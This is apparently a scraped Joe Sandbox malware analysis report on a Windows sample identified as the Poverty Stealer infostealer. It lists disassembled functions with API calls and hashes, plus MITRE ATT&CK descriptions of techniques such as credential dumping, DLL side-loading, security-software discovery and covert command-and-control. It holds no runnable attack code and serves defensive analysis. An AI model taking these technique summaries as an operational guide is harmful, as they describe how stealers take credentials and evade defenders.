
Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,007D4023,00000000,?,007FB824,?,?,?,007D41C6,00000004,InitializeCriticalSectionEx,007EB270,InitializeCriticalSectionEx), ref: 007D407F
GetLastError.KERNEL32(?,007D4023,00000000,?,007FB824,?,?,?,007D41C6,00000004,InitializeCriticalSectionEx,007EB270,InitializeCriticalSectionEx,00000000,?,007D3F7D), ref: 007D4089
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 007D40B1

Strings

api-ms-, xrefs: 007D4096

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: e463b00969a01edbdfc5ff4973f9768cb3561c33018f7ccea8923eb80a578794
Instruction ID: d4ceec464d52ff344ae940dc468e632767a1e148d9d24e7bdb63c3eb07d5a1e9
Opcode Fuzzy Hash: e463b00969a01edbdfc5ff4973f9768cb3561c33018f7ccea8923eb80a578794
Instruction Fuzzy Hash: 6DE04F31680245BBEF202B61EC46B993FB8AB04B51F508061FF0CEC1E1D7BAD9509AD9

Function 007DF497 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(D70AE4BB,00000000,00000000,00000000), ref: 007DF4FA

Part of subcall function 007E1EBD: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,007DEF8D,?,00000000,-00000008), ref: 007E1F1E

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 007DF74C
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 007DF792
GetLastError.KERNEL32 ref: 007DF835

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: eea984f19fdad07a27af921a82cf74c8cf14f19ab3010f938c9dc15ab5fbf9ac
Instruction ID: 8e379e9b1157b8b231d4b36af539ab2ababefcdd0e13b82e29fb1c6265982fa6
Opcode Fuzzy Hash: eea984f19fdad07a27af921a82cf74c8cf14f19ab3010f938c9dc15ab5fbf9ac
Instruction Fuzzy Hash: 38D16BB5D00249DFCB15CFA8D884AEDBBB5FF09314F24812AE826EB355D734A942CB50

Function 007D308A Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 007D3151
___AdjustPointer.LIBCMT ref: 007D3174
___AdjustPointer.LIBCMT ref: 007D3210

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: ccb4314720937ac7c17f30649981ba1c877acab949ca56fa9c5b88c9fa849062
Instruction ID: 5ed1090e5c9196a242971d9f71fbb7637678d33884156e981f4bec32bab568aa
Opcode Fuzzy Hash: ccb4314720937ac7c17f30649981ba1c877acab949ca56fa9c5b88c9fa849062
Instruction Fuzzy Hash: C551DF72604A0BEFEB298F14D855B6AB7B5EF44310F14452FE80687391E73AEE41C792

Function 007E227A Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 007E1EBD: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,007DEF8D,?,00000000,-00000008), ref: 007E1F1E

GetLastError.KERNEL32 ref: 007E22DE
__dosmaperr.LIBCMT ref: 007E22E5
GetLastError.KERNEL32(?,?,?,?), ref: 007E231F
__dosmaperr.LIBCMT ref: 007E2326

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 49e09a6751e470426fc0f14c16475ea1dee2f00a5fa6922873abd948a0a6f48f
Instruction ID: b390538f6cb4ae2f5819a03f9c8629952d2d98f1596b2b14ea6ae059494834ea
Opcode Fuzzy Hash: 49e09a6751e470426fc0f14c16475ea1dee2f00a5fa6922873abd948a0a6f48f
Instruction Fuzzy Hash: 7421DA31605645EFDB20AF66888586BB7BDFF0C3647108919F929D7252D77CED02CB60

Function 007D7478 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6002a79847606ed165f940bb2108498281422cc60d23d248e48a1cd4fa4e5092
Instruction ID: 2bc5ae3ff0136d7aedf41370338760c927097bc741a145edbb4b639e3584b7e4
Opcode Fuzzy Hash: 6002a79847606ed165f940bb2108498281422cc60d23d248e48a1cd4fa4e5092
Instruction Fuzzy Hash: 0321C271608205EFCB28AF75A84582B7BB9EF44364710851AF816CB350F738EC20C7A1

Function 007E321E Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 007E3226

Part of subcall function 007E1EBD: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,007DEF8D,?,00000000,-00000008), ref: 007E1F1E

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 007E325E
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 007E327E

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: b71e71b7c86f80c93c2661c6bce595c2fd8ca9912b6d2014ea10d4f4304c18a7
Instruction ID: 1d3c65a56a80d1b7c388f11240d07d934433fd34e18635fcb08ebde848dd7f4c
Opcode Fuzzy Hash: b71e71b7c86f80c93c2661c6bce595c2fd8ca9912b6d2014ea10d4f4304c18a7
Instruction Fuzzy Hash: FE11A1F2503699BFAB1127B65CCECFF29ACFE8D3A47100515FA42D6200EA3C8E019575

Function 007E7C3B Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,007E6B6B,00000000,00000001,0000000C,00000000,?,007DF889,00000000,00000000,00000000), ref: 007E7C52
GetLastError.KERNEL32(?,007E6B6B,00000000,00000001,0000000C,00000000,?,007DF889,00000000,00000000,00000000,00000000,00000000,?,007DFE2C,?), ref: 007E7C5E

Part of subcall function 007E7C24: CloseHandle.KERNEL32(FFFFFFFE,007E7C6E,?,007E6B6B,00000000,00000001,0000000C,00000000,?,007DF889,00000000,00000000,00000000,00000000,00000000), ref: 007E7C34

___initconout.LIBCMT ref: 007E7C6E

Part of subcall function 007E7BE6: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,007E7C15,007E6B58,00000000,?,007DF889,00000000,00000000,00000000,00000000), ref: 007E7BF9

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,007E6B6B,00000000,00000001,0000000C,00000000,?,007DF889,00000000,00000000,00000000,00000000), ref: 007E7C83

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 505b1082487d1278143d8348c059244a86cb5a61ceb3cb46d580e4daba7a5e0f
Instruction ID: 8ddd2281b9ea353bebd65d1b11158a6918cd4930f4ca0f56ac88c0b1256b91fc
Opcode Fuzzy Hash: 505b1082487d1278143d8348c059244a86cb5a61ceb3cb46d580e4daba7a5e0f
Instruction Fuzzy Hash: BCF01C36506199BBCF221FD6DC089D93F2AEB0C3A0F158050FA0989230C636D820DBA5

Function 038F2C08 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 389COMMON

Download Yara Rule

APIs

Part of subcall function 038F3508: EnterCriticalSection.KERNEL32(038F84D4,?,?,038F51B7), ref: 038F3512
Part of subcall function 038F3508: GetProcessHeap.KERNEL32(00000008,00000208,?,?,038F51B7), ref: 038F351B
Part of subcall function 038F3508: RtlAllocateHeap.NTDLL(00000000,?,?,038F51B7), ref: 038F3522
Part of subcall function 038F3508: LeaveCriticalSection.KERNEL32(038F84D4,?,?,038F51B7), ref: 038F352B

WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,00000005,00000000,00000000), ref: 038F2E3D

Strings

x, xrefs: 038F2F32

Memory Dump Source

Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: CriticalHeapSection$AllocateByteCharEnterLeaveMultiProcessWide
String ID: x
API String ID: 1990697408-2363233923
Opcode ID: d0d08d0a6213261475b73a9d855fee5cb7dc0bf319ef6e20379dba9fc9edc9fe
Instruction ID: d46758475965bc4bf30553be4e129f12149e8fae221f150b9c332da982b39c79
Opcode Fuzzy Hash: d0d08d0a6213261475b73a9d855fee5cb7dc0bf319ef6e20379dba9fc9edc9fe
Instruction Fuzzy Hash: 2802BC78A0424DEFCF15DF98C884AADBBF0FF09314F148895E955EB250D370AA91CB61

Function 007DBBFD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 007DBC8D

Strings

pow, xrefs: 007DBC65, 007DBC82

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: fde7a5f00e8798b2a21717d28d342c945b409566a8899f5d0c48ad9fdeb01a75
Instruction ID: 453b6847f9e0dad7f745b2a05bf89cc6212651ada960045ad3d8a5c4dc49c5f0
Opcode Fuzzy Hash: fde7a5f00e8798b2a21717d28d342c945b409566a8899f5d0c48ad9fdeb01a75
Instruction Fuzzy Hash: 1F517C61A25102D6CB137714CD8137A3BB4EB40B40F308D5BE48E863A9EF3D8CD5EA69

Function 007D3686 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 007D36AB

Strings

RCC, xrefs: 007D36C5
MOC, xrefs: 007D36BD

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 9c3f9d686148fbfa2a411350bbf76df5c0e35e8edac277c25a826092ee97fa25
Instruction ID: 2e3dd234be821ffc85f94be1312d60c831fa1c1a1386b9a86bd1c3b91c9bd3ee
Opcode Fuzzy Hash: 9c3f9d686148fbfa2a411350bbf76df5c0e35e8edac277c25a826092ee97fa25
Instruction Fuzzy Hash: 7D4137B1900209AFCF15DF98CD85AEEBBB5BF48310F18815AF90466312D339AA51DB62

Function 007CC900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 007CC9E8
task.LIBCPMTD ref: 007CC9F6

Strings

}{cdef~hijkl/nopqrstuvwx|><B-DEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()_+, xrefs: 007CC92A

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: Concurrency::task_continuation_context::task_continuation_contexttask
String ID: }{cdef~hijkl/nopqrstuvwx|><B-DEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()_+
API String ID: 605201214-2946796713
Opcode ID: 5aa8511f78a2c6477dd75bfb29c580a9eea7331b1e842b3e8cc29488cf5c6ad2
Instruction ID: 9f1c76ec20c58bc2dcf7b171a6fded9b301535aeb7691370b42f4e66e0ea88c3
Opcode Fuzzy Hash: 5aa8511f78a2c6477dd75bfb29c580a9eea7331b1e842b3e8cc29488cf5c6ad2
Instruction Fuzzy Hash: 5B31F571D04119DBCB05DF98C956BEEBBB1FF48300F20815DE419BB291DB786A00CBA1

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Poverty Stealer

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

Windows Analysis Report
SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe

Function 038F4BA2 Relevance: 35.2, APIs: 13, Strings: 7, Instructions: 208
windowCOMMON

Function 038F1000 Relevance: 18.2, APIs: 4, Strings: 6, Instructions: 667
fileCOMMON

Function 038F2054 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 134
COMMON

Function 038F4E27 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 286
fileCOMMON

Function 038F1D3C Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 139
fileCOMMON

Function 038F1C94 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69
encryptionCOMMON

Function 038F21F5 Relevance: 38.8, APIs: 13, Strings: 9, Instructions: 304
synchronizationCOMMON

Function 038F446C Relevance: 16.7, APIs: 8, Strings: 3, Instructions: 179
COMMON

Function 038F536D Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 138
networkCOMMON

Function 00783FE0 Relevance: 11.2, APIs: 5, Strings: 1, Instructions: 705
COMMON

Function 038F484B Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 231
memoryCOMMON

Function 007CFCA5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86
COMMON

Function 00783052 Relevance: 6.0, APIs: 4, Instructions: 32
librarysynchronizationthreadCOMMON

Function 038F3508 Relevance: 6.0, APIs: 4, Instructions: 18
memoryCOMMON

Function 038F46D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94
libraryCOMMON